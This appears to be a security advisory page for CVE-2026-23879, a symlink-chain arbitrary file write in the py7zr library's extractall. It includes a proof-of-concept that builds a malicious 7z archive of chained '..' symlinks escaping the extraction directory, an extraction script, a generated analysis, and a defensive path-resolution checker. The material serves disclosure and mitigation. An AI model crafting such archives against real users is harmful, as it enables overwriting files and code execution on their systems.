VYPR
High severity 8.0 · GHSA Advisory · Published Jun 19, 2026 · Updated Jun 19, 2026

py7zr: Arbitrary File Write Vulnerability

CVE-2026-23879

Description

Summary

There exists an arbitrary file write vulnerability in py7zr (1.1.0, latest), which allows symbolic links to be recreated outside the destination directory via crafted malicious symbolic link chains. When using extractall to extract an archive, the library restores these symbolic links, linking them to arbitrary directories on the host file system. Subsequent extraction of regular files through these symbolic links can result in arbitrary file writes. This vulnerability may lead to remote code execution, privilege escalation, data corruption, or denial of service.

Details

The root cause of this vulnerability is that py7zr fails to properly restrict the targets of symbolic links within an archive. During extraction, the program only checks the link arcname within the destination directory, but ignores the combined symlink path resolution. Attackers can exploit this vulnerability by constructing malicious archives, thereby bypassing the directory boundary restrictions implemented by the extractor.

PoC

Construct PoC Archive File

The following pseudo-code illustrates the vulnerable logic. add_symlink is a helper the advisory refers to but does not define.

import os
import py7zr

def create_sevenz_exp(output_dir: str):
    filename = "archive.7z"
    file_path = os.path.join(output_dir, filename)
    with py7zr.SevenZipFile(file_path, 'w') as archive:
        archive.writestr("Some Text", "dir0/someFile.txt")
        # Each target passes a purely lexical check (dirN/.. normalises to the
        # destination itself), but resolved through the previous link every
        # hop climbs one directory level above the extraction root.
        add_symlink(archive, "dir1", "dir0/..")
        add_symlink(archive, "dir2", "dir1/..")
        add_symlink(archive, "dir3", "dir2/..")
        add_symlink(archive, "dir4", "dir3/..")
        add_symlink(archive, "dir5", "dir4/..")
        add_symlink(archive, "dir6", "dir5/..")
        add_symlink(archive, "dir7", "dir6/..")
        add_symlink(archive, "dir8", "dir7/..")
        add_symlink(archive, "myTmp", "dir8/tmp")
        # A regular file extracted through the final link is written outside
        # the destination directory.
        archive.writestr("Malicious Text\n", "myTmp/poc.txt")

Unpack the archive

Use common decompression methods, then extract the archive.

import sys
import os
import py7zr

def extract_7z(seven_path, output_dir):
    os.makedirs(output_dir, exist_ok=True)
    with py7zr.SevenZipFile(seven_path, mode='r') as z:
        z.extractall(path=output_dir)
    print(f"Extracted '{seven_path}' to '{output_dir}'")

if __name__ == "__main__":
    seven_file = sys.argv[1]
    base_name = os.path.splitext(os.path.basename(seven_file))[0]
    output = base_name + "_sevenz_output"

    extract_7z(seven_file, output)

Impact

After decompression, the output directory contains a sequence of symbolic links that ultimately resolves to the system root directory. When a regular file is then extracted through that chain, it is written to an arbitrary path.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.


Vulnerability mechanics

Root cause

"py7zr fails to properly restrict the targets of symbolic links within an archive, only checking the link arcname within the destination directory while ignoring the combined symlink path resolution."

Attack vector

An attacker crafts a malicious 7z archive containing a chain of symbolic links that, when resolved, point outside the intended extraction directory (e.g., to the system root). When a victim calls `extractall` on this archive, `py7zr` recreates the symlinks, and subsequently extracting a regular file through the final symlink writes content to an arbitrary path on the host filesystem [ref_id=1][ref_id=2]. This can lead to remote code execution, privilege escalation, data corruption, or denial of service.

Affected code

The vulnerability exists in `py7zr` version 1.1.0 (latest at the time of disclosure). The `extractall` method fails to properly restrict symbolic link targets during extraction, only checking the link arcname within the destination directory while ignoring the combined symlink path resolution [ref_id=1][ref_id=2].

What the fix does

The advisory references a fix in py7zr release v1.1.3 [ref_id=1], but the patch diff is not included in this bundle. The recommended remediation is to properly validate the resolved path of symbolic links during extraction, ensuring that no symlink chain can escape the destination directory. Without the patch, the library remains vulnerable to arbitrary file writes via crafted symlink chains.
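The difference the Details section draws, a lexical check of each entry against the destination versus resolution through the symlinks already declared, and the remediation described above, as an added example that is neither py7zr's code nor the advisory's PoC. It models an archive as an ordered list of (arcname, symlink target) pairs so it runs without py7zr; the entry layout is constructed from the PoC above, and the hop limit of 40 is an assumption.

```python
import posixpath

# Constructed sample: the advisory's PoC layout as (arcname, symlink target) pairs in archive order; None = regular file.
POC_ENTRIES = [("dir0/someFile.txt", None)] + [(f"dir{i}", f"dir{i - 1}/..") for i in range(1, 9)]
POC_ENTRIES += [("myTmp", "dir8/tmp"), ("myTmp/poc.txt", None)]

def inside(norm):
    # A normalised archive-relative path is safe unless absolute or climbing above the root.
    return not (posixpath.isabs(norm) or norm == ".." or norm.startswith("../"))

def entry_path(arcname, target):
    # What to validate: the entry itself, or a symlink's target taken from the link's directory.
    return posixpath.join(posixpath.dirname(arcname), target) if target else arcname

def lexical_check(arcname, target, links):
    # The weak check the advisory describes: purely lexical, ignores already-declared links.
    return inside(posixpath.normpath(entry_path(arcname, target)))

def resolve(path, links, hops=0):
    # Resolve component by component, splicing in the target of any symlink declared so far.
    if hops > 40:
        return ".."  # give up on a symlink loop; the caller treats this as an escape
    parts = [p for p in path.split("/") if p not in ("", ".")]
    out = []
    for i, part in enumerate(parts):
        if part == "..":
            out.pop() if out and out[-1] != ".." else out.append("..")
            continue
        here = "/".join(out + [part])
        if here in links:  # a symlink sits on the path: substitute its target and re-resolve
            if posixpath.isabs(links[here]):
                return links[here]
            return resolve("/".join(out + [links[here]] + parts[i + 1:]), links, hops + 1)
        out.append(part)
    return "/".join(out) or "."

def resolved_check(arcname, target, links):
    # Symlink-aware check: the remediation the advisory recommends.
    path = entry_path(arcname, target)
    return inside(path) and inside(resolve(path, links))

def first_escape(entries, check):
    # Walk entries in archive order; return the first arcname `check` rejects, else None.
    links = {}
    for arcname, target in entries:
        if not check(arcname, target, links):
            return arcname
        if target is not None:
            links[posixpath.normpath(arcname)] = target  # remembered for later entries
    return None
```

Run against POC_ENTRIES, the lexical check accepts every entry while the resolving check rejects "dir2", the first link whose target already climbs above the destination once "dir1" is followed.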

Preconditions

  • Input: The victim must extract a maliciously crafted 7z archive using py7zr's extractall method.
  • Network: The attacker must be able to deliver the crafted archive to the victim (e.g., via email, download, or file upload).

Generated on Jun 19, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
